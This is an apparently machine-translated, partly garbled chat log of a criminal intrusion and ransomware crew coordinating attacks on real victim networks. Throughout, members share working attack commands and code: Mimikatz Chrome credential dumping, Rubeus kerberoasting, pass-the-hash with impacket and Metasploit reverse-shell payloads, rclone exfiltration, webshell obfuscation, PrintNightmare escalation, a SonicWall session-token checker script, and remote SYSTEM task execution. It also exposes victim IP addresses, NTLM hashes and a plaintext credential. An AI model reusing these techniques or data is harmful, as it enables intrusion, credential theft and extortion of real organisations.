Please share your experiences who worked with Exploit EternalBlue in MSF ...? Whose? I understand, thanksgreatest thing is that 90% of the time 1 naprol to everything) also in the software can be IT folder with passwords, but also they can be passwords in excels found on the desktop and in the docks, called passwords) Once these same excels found in van drive authorized in the mail bodyHi all. Podskazh please, where can I find the Credits from Datto? Viam, orbs, cypress, chrome is understandable. Any other options, where they are most often stored? Maybe some way out of the clients can?[ ](https://stylebrooks.com/group/general?msg=ynnSjY62yQAhZMDoG) cps, added to the notes `execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\ guys can I add to the confab about tool chain? you shoot sharphound, you drop it into bloodhound -profite in two words who can explain how bloodhound start using?[ ](https://stylebrooks.com/group/general?msg=TXftyYQdkvMqd6B9X) resolved through the replacement
wusa.exe
to
rundll32.exe[ ](https://stylebrooks.com/group/general?msg=4SXBDzeGnxSzwguH4) do you need to connect as local admin? or enable local admin service?
jhmW6WXkvsAwheK2P5XiR8Cm7k6dYgnFAcD8y6ONiZBZbEQIUFk1gVjdnpSwqHDq
```
look whoseHello, everyone.
If anyone has run CVE-2021-21985 for vCenter, PM me please.Greetings all, question to the knowledgeable, when backing up a skul base
sqlcmd -E -S localhost -Q "BACKUP DATABASE databename TO DISK='d:\adw.bak'"
If the base is a pass, then in the backup will also be a pass, can you remove it (pass) during the dump or what else to get the output backup has no pass? Got it, thanksBut still, if the question is about speed, the method can be easier to take. How else can I do it if there is a large attachment and the number of files? I divide into portions of the archive that would be easier to download by 8gb7ziptopodskip, do you archive files before uploading or take away as is? if so, what is the speed?
IP Address: 23[.]82[.]128[.]116
Domain Name: secost[.]com
Whose? I need to check one@all who has a session on the cob from a user's machine with system rights and an authorized user - please write to pm and give me access to this cobaPerformance of this should not depend on which av. if evil, they may swear, won't they? ``mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
button in the context menu, runs on all selected, the output is crooked, but it's the wind, no time to mock further, the script itself removes after itselfmasonDoes anyone know how to check whether tapes are connected in veritas backup exec?
I can't use library, says it does not support it on the forum please obfuscatorFor those who have asp webshell is deleted by aver! you can obfuscate not only the one in the archive, it removes the detects
link:
```
https://github.com/grCod/poly
```
-
command example:
```
poly.py -c aspx -e rnd -p shells/shell.aspx [-j]
```
parameters:
```
'-c', = 'Shell code. [ php, asp, aspx ]''
'-e', = 'Encoding method. [ b64, ord, rnd, rot ]''
'-p', = 'Path to shell.'
'-j', = 'Add junk code.', action = 'store_true'
``Yes, 100k hashes, I use ntds hashes for brute-force cdbx\archives/extracell - best[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=o3pBToWQ5KsWzu2fF) What's a top subscription? Brute-force ntlm and kerberos[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=bfiBdmKfuyTcw4k3S) first thing I check on cmd5.org
I give to the section paid hash hacking on eksp, but you can go directly to the two guys who most decrypted me, it is:
```
https://forum.exploit.in/profile/85027-amiga/
https://forum.exploit.in/profile/46932-sc0rpi0/
```
They should be able to help in any case, thanks, I will keep in mind a well, 100k hashes. how's everybody for a top subscription ?
I also have an account, there seems to be a lot of wood, should be enough for a long timedunkshesk also monthly subscription, who wants - please @brandon cmd5.org has an account, who need it - welcome, top subscribeDemand if we collect the top 10-20 links, then create a branch here and collect a total stat - the leaders will be revealed fairly quickly and everyone will have access to itfor quality decrypt - to be honest, I'm not thrilled, but, I used it a little, the feeling that cmd5 works better, but there is a bulk fit and it is free, but there is captcha peskyhttp://crackstation.net/do more services
It's a common fucking problem, let's solve it :) in cmd5 you can get a bunch of hashes through a page with 200 hashes and a lot of hashes through windows binary.
ntlm hashes can't be done with topchicopt, but it's like there's only one hash at a timecmd5.org seems to work fine@all who decrypts hashes?
There are a couple of people, but maybe synchronize all the contacts, services, farms to make it all run more efficiently?
The idea is to give a dozen hashes to online services and see the output, where brute force - then the service really steals, similar to the bruter from the different forums
We could compile 10 services, then make up the top 3 and work with them constantly
I made a mistake with the chat. Sorry. 10.200.0.4
10.200.0.5
10.200.0.8
10.200.0.9
192.168.170.250
192.168.170.251
192.168.170.252
192.168.170.253
192.168.136.56
192.168.136.137
192.168.139.153
192.168.254.52
192.168.255.52
192.168.254.76
192.168.255.76
192.168.254.53
192.168.255.53
192.168.254.74
192.168.255.74
192.168.254.54
192.168.255.54
192.168.254.55
192.168.255.55
192.168.254.72
192.168.254.71
192.168.255.71
192.168.254.68
192.168.255.68
10.20.6.63
192.168.136.6
192.168.136.5
10.20.6.26
192.168.136.29
192.168.136.151
192.168.170.249
10.20.6.42
192.168.136.100
10.20.6.201 ``@all in which congress the locker is missing tell me
i lost some one where the software should be put who dealt with it that would not fade RDP when inactive what settings should be done? that too bad, the pass in the clear will lie near) googled on the subject, like they say you can create in a folder with pklon .ini file and set SET RCLONE_CONFIG_PASS = хххххххххххххххххх without entering it into the consoleThe question is how to pass the parameter with the password at startup, from the cobbs, say\[ ](https://stylebrooks.com/group/general?msg=uNucyKgWbHMYkgvsC) the conf file is better to put somewhere in one place and all exe specify in the command where to take it from, like this `copy --config C:\programdata\Oracle\Java\.oracle_jre_usage\rc.conf "\\192.168.1.13\H$\Backup\Data\000\000\0\0\17" options:.....` since it's not easy to collect conf files later, and there you can tell the information in the palm of your hand...and then the megs will crash often that would be more fun with the encryption would be to rewrite it) reliably:joy:I will give you by64 encryption if memory does not changeconfig you create and forwardxxz, the default password is encrypted, about the soap, you still the file rclone.conf file and put it next to the ecz, then delete it as you downloaded everything, about the background, I do not know, I use rdp to start and kmd is spinning - I do NOT logoff - just turn off, if you want to logoff - need to run from the system as a service, and the system is not available from the ball, but if you have them primaunched, but this is also an extra finger done, you can encrypt the account and password, but it is entered only with gui, and without gui, such as coba to do it?how can you run it from the system, and logoff the user that it would applaud in the background who uses rclone for upload?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=e6eJ25taoi6Fe3bMX) yes, that way and solved the problem ....) if you look through AIP there in the hostnames you can look for DCusually the first dns is always dkipconfig /all dk is usually a dns serveraga[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=8oG8jzK5tD2WuqcHs) do you have both netextender and smac client installed? both?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=MYsCigPb35ihL2Adu) i don't know dk aiP, so i asked for sabinetikh) i hardly shut it down recently, no disconnect, button is not active, reboot does not help I had a hard time disconnecting it, it wouldn't work when I restarted my computer, I had no rights to fuck it up, I stalled my processes and the service brought them back up. I had to uninstall it and it would connect to the network by itself) it's a glitch, sonic maybe somebody met that, when I connect to a client with a sonic vpn, EPC agent pumps and then opswat override. As finished any creed knocks out EPC Check fail.See log for more detailsaddfind -h 10.200.58.11 -u jacquetmetal-sb\tomasetr -up willi2712 -f "(objectcategory=person)" > ad_person.txt like this from the usercrede can collect without problems 16 subnet simply will scan forever why bad collects? they are either set by the admin or not, no?no no, you need exactly the gathering of subnets WITHOUT the adfind, when only the ipn is and the user's credentials, more nihuadfind kalovo collects, I like to do so, we parse all the hostnames from ad_computer's then ping them with pinginfview, arrange the output by ipi addresses, then just parse all the subnets from there /24@all please share the script for gathering subnets without adfind =)thank you```.
psinject 000 x64 Invoke-ShareFinderThreaded (-CheckAdmin Admin Balls) -NoPing (-MaxThreads 4 number of threads)
argument, I'll send you @Code can you modify the script so that the number of threads is given as an argument? so look at the thread count depending on the patientThe optimal number of threads for bulk queries in general is
10-15 - lowsec
8 - midsec
4 - highsec you can adjust number of threads, 10 is good by default[ ](https://stylebrooks.com/group/general?msg=hARNSxBzn4gfD2R3f) wow, that's pretty cool about multithreading try to put it on dinchek without arguments, but i don't know what it will show you, dinchek can only run the build with regsvr, you should run it with radll[ ](https://stylebrooks.com/group/general?msg=pxXX4YjQaHh298T8ds) get a monthly subscription, there in the scan options you can specify an entry point for the dll, after you upload it thereI mean the locker.[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=pxX4YjQaHh298T8ds) Good morning! I think in cobalt_v42_patched wrote that with the function DllInstallGood morning, everyone!
Can you please tell me how to properly check the DLL of the build on the dincheck?
Is it necessary to specify some kind of input function? obfuscator of webshells, I have not tried it, but guys from ekspa say it helped to avoid detects, if it works let me know
```
https://github.com/grCod/poly
Guys, when connecting via an ndp via ngrock backdoor, displays an error (after the request creeds) may be useful to someone - looked script ShareFinder recently, there is a multi-threaded scan with the output in the console only the ball, where you can get and get all the computers in the network, which incidentally works better than net view, which sometimes dumps + search all mssql bases in the network (not in the balls)
```
powershell-import ../ShareFinder.ps1
psinject 000 x64 Invoke-ShareFinderThreaded -CheckAdmin -NoPing
psinject 000 x64 Get-NetComputers (-SPN mssql* find all mssql databases on the network)
``[ ](https://stylebrooks.com/group/general?msg=S8xDjNpZfL7xambxD) 192.168.17.0/24 tell me and try to get into the neighboring ones. It's not like it opened normally in myexec just pseudo-admin rights, you can't do it without rights[ ](https://stylebrooks.com/group/general?msg=NHenn8A3SoicnprGj) the same thing with wmiexec I tried it too `or climb the rdp through the hash `t !! but for this you need to bang this `reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f ` but it too needs 445, for authorizationwmiexec.py powera although fuck you have no admin rights, you can not get into or climb over the rdp through the hash then look for another server where 445 to 17.250 will be available but session does not comeintinet is and the domain is even pingedinet no? if you run kmd you run and randll32 not up and that's the point so pick up the session there `netstat from the host where you have a session hangs? no, netstat unchecked 192.168.17.250 there is access by redneck user `admin-nono` (visible above) but the user has no rights there can not let them in if I understand correctly how it should work to your mind?)and 192.168.17.250 and the host where your session is not the same host correctly understood that you checked the 445 port to 192.168.17.250 took netstat from the host where your session hangs?[ ](https://stylebrooks.com/group/general?msg=7taaTE5323nMtEZZt) and how it is closed if :
`TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 ` that's the problem, we can not raise the session as one of the options If you can get in by RDP - get in and raise there session
port number -Pn -O -v -p 445 192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 20:57 MSK
Initiating Parallel DNS resolution of 1 host. at 20:57
Completed Parallel DNS resolution of 1 host. at 20:57, 0.00s elapsed
Initiating SYN Stealth Scan at 20:57
Scanning 192.168.17.250 [1 port].
Completed SYN Stealth Scan at 20:57, 2.04s elapsed (1 total ports)
Initiating OS detection (try #1) against 192.168.17.250
Retrying OS detection (try #2) against 192.168.17.250
Nmap scan report for 192.168.17.250
Host is up.
PORT STATE SERVICE
445/tcp filtered microsoft-ds
Too many fingerprints match this host to give specific OS details
Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
Raw packets sent: 50 (6.760KB) | Rcvd: 45 (7.334KB) So you should check smb instead of ping
the netstat you took off - it's not from the remote host? in general, from the host where you have juxtaposed all pings From the host where you have juxtaposed I can use rdp to connect but the user is not interested in it has two rights there sneezes or the host is not available from the host where you have juxtaposed vicitpespes filtered at the network level
who uses the impacket?
what could be the problem?
```
proxychains ./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:11ce1cfb0c1e884386990eb5650f3cf6 Administrateur@192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
|S-chain|-<>-209.222.98.79:48-<><>-192.168.17.250:445-<--timeout
[-] [Errno Connection error (192.168.17.250:445)] [Errno 111] Connection refused
```
port is open on the host
```
:\Users\admin-nono>netstat -ano
Connexions actives
Proto Adresse locale Adresse distante État
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0``
``open aha if port 135 is open - put the token through the mimic in memory and get into the mikechek ports open or the Windows hangs, if node would block it would immediately write an error but it hangs long node blocks the reason? port is closed or what? I say the psec does not work heresmb/psexec ``
/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E
``impacket wmiexec google[ ](https://stylebrooks.com/group/general?msg=GAhKvYbMXMaqfZs9m) well fuck me)from my virtual machine tried to put on mimic, but when you log on psec the session hangs and hangs and hangs just mfc or ermiexec the cob, work without it and in ermiexec the cob?
```
pth [DOMAIN\user] [ntlm hash]
``no, what is this tried? trabh, nss have local admins, but no domain admins
where these locals go, no admins go, there's a servak, there are domainadmins hanging there, but there local admin we have only hash, and it doesn't open by hash session, hangs and hangs for a long time
but it's possible to get in there not as a local admin
on the rdp.
there may be a way to have a legitimate hash admin? no rights to sue the lsas
the network is working network nod32da if 2fa is worth it can fly at once manymozhet I'm wrong, sonic logs do not knowno generally I threw - but it sticks, on this token and try to come in check the username and password are? if someone has suggestions for automation - write too, I smell in my spare timeperepeylaet under everything, someone somehow write back later how it worked in ls[ ](https://stylebrooks.com/group/general?msg=Xwwwgu3QA3CjcqtD7N) zvhhitech[ ](https://stylebrooks.com/group/general?msg=mhHvkTKNqMMgCDGpW) ad_users >objectSid:hello all. where in ad info writes the domain seat for golden ticket? guys who worked with ovh.com; export the box or migrate history to another server interested in on the wine will - I will knock down eh ``
./check-sonik [site.com] [path to sessions.json]
at the end will output sessions with cookie tokens ready, no need to do btoa, here's an example:
User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMNMldJU3dWM2I4QT0=We do a kerberoasting attack via VPN from a NOT domain machine, having VPN cres
```
kerberoast remote from non-domain machine with domain user creds:
1. Rubeus.exe kerberoast /dc:wesads15.wes.local /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt /creduser:domain.local\username /credpassword:UserPass!
Asreproast remote from non-domain machine with domain user creds:
2. Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt /dc:dc.domain.local /creduser:domain.local\username /credpassword:UserPass!
```
As you can see we are doing the same as in the usual attack, we just add 3 new attributes:
/dc: - specify the domain controller
/creduser: - username of the domain user we are launching from
domain user login and password from which we start /credpassword: - password of the domain user from which we start - I will just do it once, why don't you add the build with examples of startup?
import os
import sys
import requests
import json
import time
import threading
import base64
main_url = sys.argv[1]
file_uri = sys.argv[2]
print('Site: ' + main_url)
def checkToken(token, user, password, domain):
global listOfUsers
base64_token = base64.b64encode(token.encode("utf-8")).decode("utf-8")
portal_url = 'https://' + main_url + '/cgi-bin/portal'
headersData = {
'Cookie' : 'swap=' + base64_token + '; SessURL=https%3A%2F%2F' + main_url + '%2Fcgi-bin%2Fwelcome',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0',
'Content-type': 'application/json',
'Origin': 'Origin: https://' + main_url,
'Referer': 'https://' + main_url + '/cgi-bin/welcome',
'Accept-encoding': 'gzip, deflate, br',
'Accept-language': 'en-US,en;q=0.5'.
}
print('Check user: ' + user)
x = requests.get(portal_url, headers = headersData, verify = False)
if x.status_code == 200:
if(x.text == '
')
print ('Bad')
else:
listOfUsers += 'User: ' + user + ' Password: ' + password + ' B64 token:' + base64_token + '\n'
print ('Good :' + user)
json_array = json.loads(open(file_uri).read())
thread_list = []
listOfUsers = ''
i = 0
for item in json_array:
i += 1
item = item.split(' ')
thread = threading.Thread(target=checkToken, args=(item[0], item[2], item[3], item[4])
thread.start()
thread_list.append(thread)
if i % 10 == 0:
time.sleep(5)
[thread.join() for thread in thread_list]
print('\n\n\n\n\n' + listOfUsers)[ ](https://stylebrooks.com/group/general?msg=NpJTET9Nc2hDto4np) scan the subs, see what services are running
you can macro-assemble the dossier from username to username.
mail carefully on your free head you can readSoon we'll hire droops, they would organize ventry points in the office)))) if there is no choice, why not)maybe see who is an IT designer how to write, create a domain similar and write in his style
but it is not worth it probably - there was a mail to the IT director
from him wrote to some lady who was scanned by public companies that she is 30-40 years old
asked to set up a timeweaver id pass
went in, started palaud
email in the spam filter put and monitored but palsy at some point[ ](https://stylebrooks.com/group/general?msg=oZdH9QkFppTXLeHfj) Are there any other possible options for this problem?) I tried to connect to the mail, some mails do not fit creeds, and where they fit 2fa on the phone is, rdp added, but do not connect, even I do not know what else to try[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=HSNtHKeYMXQB4JPDX) found the input mail, but alas do not fit creeds (` `)
Unable to verify client certificate
```
sonicwall
i have a problem with it? @Bug let's give it to me and there should be ok everything) will try to reinstall it, strange behaviorvirtualkahttp://imgur.com/KxqQ8yh.png are you on the deck or on a computer?and the disconnect did not make a pidpeck, i did reboot the pc, i turn on and there HE, running with the account network i got hooked up, i must be bustedda wanted without a reboot disconnect from the autorun and reboot?well everything turns out, the network has absorbed you, you're part of the network, the fuck you disconnect) it again raises the processtupo not stop services, processes kill, and the service does not give a fuckta i told you, the button disconnect is not active[ ](https://stylebrooks.com/group/general?msg=iPHM9hgzYmF43NgXR) does not allow the system to cut it too, and the tin or reinstall or reopen the process then I do not know)) the system processes it enabled because no access and app blahwhy?i can't disconnect it from the user or is it a system csmd need to kill the process how to close the fucking sonicqual extender? no disconnect button, it is inactive, the ecite does not come out, but hides the current, then i turn it on and it works again, processes from the system, the user can not exit, what the fuck) bingo
try to get into the mail with the same cres[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=7XYNhwfT48wEpBBia) aha specified their domain sabysdomain.com - their domain? ah, they have this: A temporary password has been sent to your domain.com address. Please enter it below.
is not explicitly stated that the mail, just the domain address, but in theory should the mail?) 2fa code sometimes arrives at the post office
subdomain with mail find and take out from there the code and all ok
it works if it arrives at the mailThrough the email to the connection to the VPN? Or try to read the soap as described: "take off the subdomains of the external domain and try to find the mail "through the soap nest tried through the soap? 2phapo vpnu no connection ?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=wG38vpxeqC42uny6x) yes it seems local) they are lit, 192.9.201.50 192.9.201.93 192.9.203.110 tried and .local and .com does not help, and there if rdp worked, I think any domain could write it would give out that the creed is incorrect, but here is just no connection to rdp Tugrebyat, tell me how eset file security quits?dcsync is a fucked up way to go either way) and sofos is storing the winndogs? it's like just against malware? how quiet is it to do dcsync on specific users with sofos on dk? yeah, thanks a sec, i'll try it now@Andy also can remove subdomains and see some Citrix / RDWeb / guys, salaam
Does anyone have a poc CVE-2019-0543
can't find it on google, try to read my mail
remove subdomains external domain and try to find the mail that you have such an ipak 192 9 201 93 ? it's external and will be clinging to the DC on the ideadomain.comdomain.мocaelpoprobyyt indicatebyl together with a sonic in the file, already and random ran them) can RDP closed, where do Ipas take? who facedrandom overran already ips RDP, not one does not connectPriestu all! Tell me about Sonic, in the web when you come in no rdp, I create a bookmarkVapo I had such a thing, I created a virtual and it raised without problemsDa, can die, but better check.nah, there token after a while only can, then all? Through the session tried? As I think the credential initially we have the correct, but there is a limitation to connect, no one encountered?Trouble is, there is a sonicwall to it 6 Credits, when you connect to webmorda long processing is (a couple of minutes) and the result gives out that the creed incorrect, and if you specify the same login but change the pass to at least 1 character will issue that the wrong creed almost immediately without waiting a few minutes. :)2ya understand the inventory and disk, disk (2) on the logging of things to press?)) to remove the replica reliably from the center, which of the buttons to press?
1. Control Panel -> Internet Options -> Advanced (tab) -> Security ->
mark only "Use TLS 1.1" y "Use TLS 1.2
2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites
put "add this website to the zone:" https://url_ip_site_gateway
```
the problem is that he netifikat generate ssl 3 and all will go in the settings of the Internet explorer ssl need to put if we solve the problem - will tell you how to solve it does not help) yes, I have this often, i got the error code -7200 when i connect from the nix client, openfortivpn is ok, but i can't connect from the windows, what's the problem?has anyone caught error -7200 on fortivpn with valid credentials? how to check whether the entripoint is "standard" - run it via randl32 without the argument of entripoint, if it starts, it will not go through StartW
you need a dll with a standard entripoint, like EntryPoint
so the print spooler can load the dll as a driver at allbo only fixed the error that now everything ok writeshttp://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html did for this manu as an option here offered to bring down the dll with the command to add local admin but I have not yet normally tested but in my case StandWhich does not matter should come session with elevated privileges entry point in the dll what should be `` ``.
lpe_cve_2021_1675
and in Beconedell should be called lsass.dll on Target, put your dll on the path C:\Users\Publishwith koba please send files and How did you do it) thanks a lot. now says 0 and everything is done and working) yes thanks) File Not Found turns out error - it's a Windows error, google the list of standard vin error codes and try to guess what he does not likelpe I have not tried, only pseepriyutsya to the question, where not tested all of the type is complete and two errors do not know what and nothing in fact failedgod post in the PM who managed to successfully perform an attack ` CVE-2021-1675 / CVE-2021-34527 ` PrintNightmare. Need tips tips ... tell me how to move the crosses under which dumped - logged in skul databases, this crosses dada long did not get caught skul base, and then I had to dump them and here's the shit came out guys hello ``Message 976, Level 14, Status 1, TransSQL1 Server, Line 25
The destination database, 'Bol', participates in a group of availability and is not accessible at this time for consultations. The data movement has been suspended or the availability replica is not enabled for reading access. To allow read-only access to this and other availability group databases, enable read access in one or more group secondary availability replicas. For more information, see the Alter Availability Group instruction on the SQL Server on-screen books.
Anybody got a cob with clean payloads? A pre-built exploit for a remote code execution vulnerability in VMware vCenter ( CVE-2021-22005 ) is now widely available, and cybercriminals are taking advantage of it.
Unlike the version posted on the Internet at the end of last week, the new version of the exploit can be used to open a reverse shell on a vulnerable system, allowing the remote execution of arbitrary code.
``Session after the jump, the process he created under which process was the session?
there were nasa and netapp feeds from three different servers, one didn't have av, two had av?
i meant that after the local drives it goes to the network, but it just shut them off, not even sure if it's a bug, just a "nuance" injection locker through a session on the server for some fuckin' reason shut down all the drives primaunched
the mount was via token
why this happened dz@all have any actual list of crypto URLs (exchanges, web wallets, etc.) atomhashersarmpiperperry have any free harddisk with patty on board?I'll send it to decrypt it. I'll try to decrypt it first thing. Can I try to decrypt it first thing?
[*] Started service listener on 173.232.146.32:445
[*] Server started.
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:df4cc93564883530f00c92be1333edfc
NT_CLIENT_CHALLENGE:01010000000000002c4b97d25085d601a70b92049be339e400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:c5afc76c2d09ad6c7ce13f420b2ec61a
NT_CLIENT_CHALLENGE:01010000000000003264c3d25085d6019ce5ca50c8b5de4400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:fd5be12ff64b685d4aa74e26ad3947b1
NT_CLIENT_CHALLENGE:0101000000000000893ed5d25085d601f1f9d3719c7319f700000000020000000000000000000000
What's the answer in the log? I don't know what's in the log. it's a little fucked up. it's complicated. but it's broken) I see the answer. now there's something in the log? so I tried to autorize it. beacon> shell dir \173.232.146.32\aksdjaklsdj
[*] Tasked beacon to run: dir \173.232.146.32\aksdjaklsdj
[+] host called home, sent: 63 bytes
[+] received output:
The user name or password is incorrect.
``Now I checked and went on and when I specified the ip first not off) I first ip did not specify and the server startedmozhet you have not rootlog plza ok then I will look at what's upokoba not take 445445 port (fuck and I have a koba and msf near the smb policy allows you to do so. just generate and spread it out in a balloon of 10-15)and if hash comes again do a shell dir \\\YOU_IP_WITH_MSF\aqqdj up this module near me)msf at hand? On the responder start the listener quickly)https://habr.com/en/company/pentestit/blog/337390/секага happy se``beacon> shell dir \\\172.93.110.126\c$
[*] Tasked beacon to run: dir \\\172.93.110.126\c$
[+] host called home, sent: 54 bytes
[+] received output:
The network path was not found.
``Here and output do simplyIp specify the session? Output what? shell dir \\172.93.110.126\c$ how to throw the shortcut?) do so then in decrypto at the necessary networks will come hash network and if the person in you through esplorer this open the balloon you throw a shortcut will not need it to catch the user right?although you can throw the shortcuts, but it's also a variant so-so.... yes, I've tried everything on it, but there is a question of implementation and experience to practice honestly? not worth it pomoymuyuhuyu turn around) 60 machines4 serva12kka revyewhat with this? ugh) 1. smoke lepE
2. look towards the web - run akunetix with socket in the local area and upload
3. Raise permissions via MsSQL from two machinesSeChangeNotifyPrivilegeSeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilegegetprivs not admin ..beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are TRIDENT\since exactly getuid? polozak(yuak no problem to bypass via sstask inside the localhost like if you have an adminkanet tried to decode in bace command that would bypassgetuid works UAK forgot to specify only from polozakanetThe server got there - you have the rights of the system? Balls don't lead anywhere, there's nothing interesting about them. There were 52 passes pulled from the browser. I ran a SMB login and found 4 passes from 4 accounts. Out of them 1 account more or less, which only fit the server from which I also tried to collect everything. Kerb is not removed. In the group is empty. Vulnerable to MS17, what to add polzak, - no. Stas does not work) Standard boosts (elevate, too). Also tried brute-force passes - fuck. No restrictions on the number of attempts. what do you advise? -I'll write now to the group with the network, so as not to rubbish here Tell me what you're going to brute force there send me to the network I'll get so fucked if there are a lot of users, ie, I specify a specific user and a file with a pool of passwords, right? by pass brute force userUSERPASS_FILE and I have a pool of accounts and a pool of passwords and fuck knows what password to which account comes up da
and if hash
user LMhash:NTLMhash etc. So, the userpass file, as I understand it, contains a username and its password, and it's in one line:
Vasya 123here it was turned the script is better not smb loginYes, it is always best to use USERPASS_FILE :)
And then the smb smart brute-force in generalThe people, information for reference:
did brutforce in msf through smb login, did with a pool of passwords and logins, ie, among other settings pointed to two files - one with logins, the other with passwords
it turns out that you can not do so, because it is unnecessary alertsThank you 1jobsAnd how do I stop the coba ? https://github.com/tevora-threat/PowerView3-Aggressor
Might come in handy for someone.Yeah, interestingHaven't checked it out, but it's an interesting topic.https://github.com/gloxec/CrossC2:handshake: goodnight:hand_splayed:see you all tomorrowBefore all. See you all tomorrow. Waiting for 15 human factor will always remain on the vectors I gave a very small base))))@steven it is already lpe they did not show it)okn tomorrow)@alex bring a specific case for discussion, describe in detail what you did, what did not work with what rights and so on, which give the substitute dl can see the services of the other how to go from this machine without a license is the only way?to polzak and everything you take off in the pid jumpa i realized that in the msf is how to do it right i showed you i mean balls are not taken off what to do with them in general the nets cause no session from polzak nothing ball is taken off friends, i plan to leave soon for today, Please tell me your impressions, problems you see, ideas to discusscompetence * I do not have enough for myself to do a normal manual, here's razetki fucking great even a child would understand the zone of responsibility teamleaders include:
1. Giving out cases for work
2. Teach, advise, instruct.
3. Connect in the process of solving atypical or unprecedented tasks
4. Help with builds of loads, fixing in the network and other technical questions concerning the software.
5. Provide the necessary guides and manuals.
Guys can give more cases according to point 1. ? manuals, etc. really would like to do by example, or at least look at google razetka) banal carelessness admins are written in the comments kredyno human factor will always) =) Michael, you pomoymu already have a problem, huh? =0 With each year the nuts are tightened Alter you as a seasoned wolf, tell me every year it becomes more difficult to pick up? or is it a myth?i have no problem with gladly listen to all the ideas / suggestions etc. at the end of the day i have a small meeting for this channel, in an hour here - discuss all the ideas / questions / problems))) ok) maybe something useful will pop up, i just throw out some ideas, generating michael, you can download a broken web scanner, run via sockets and pinged on the local ipaks. all eh. where easier? who are you going to hire? = ))) i did it today, one command worked if you don't understand it, don't bother.
why spend thousands of hours if there's a ready-made one? that's why small grids are given to beginners in the beginning. even the word hello is a template michael, you just need to get into one area and work it out. you've been told on the web what's making your brain melt, exploits are effective but you need to work in one direction and then switch to another... well, how the fuck does it work? the "topchik" doesn't fuck with skeletons and instructions) it's just fun to finish a web to the end. it's like with the chick, it's interesting to fuck up the topchikToday it was only a ruler, what's there to strain that.afk 10 minibat my brain melts men since school did not strain so )just so coincidentallymichael, you just have a couple of grids so far have fallen. no big deal =)well it is also logically clear, no need to make noise in a bunch of streams, no need to generate dirty loads. i did not know that i think the beginners here also did not know it all and movebase they give you in large networks automatically alerts and within an hour they cut out or else decide my friend not a skeleton but a template in small networks do not follow itwhat other skeleton do you want to see? in a normal network you'll get kicked out fast and it's just as logical, no need to make noise in a bunch of threads, no need to generate dirty loads, you need a dll which should be checked once in 2 days for randomness on the target AV anyway there is a general "instruction" - you just need experience...large may be we make a general instruction on what you can and can not do with large networks?everything comes with experience but i already understood that in my case, i can't do fat networks with one person, i can reduce the load on the network, is there a logic in it?rattling too long , it's clear the fucking hand is not shaking yet)) and what did you do before this who have any thoughts so they will not betray us ...rap )guys already second fat network blitzing dostNew school is lilkristall , ogbudda :smile:new school rules )havan:joy:rapday in an hour we will return to it huh? )rock or rap ?I suggest everyone to discuss a serious question in case you haven't seen ?Start a binary on a remote machine through SCHTASKS from Cobalt Strike
We put it on the
\remote-hostname123\c$\Programdata\srvvhost.exe
1. Creating a task with SCHTASKS :: SYSTEM CONTEXT OUTPUT
shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvhost.exe" /sc ONCE /sd 01/01/2021 /st 00:00
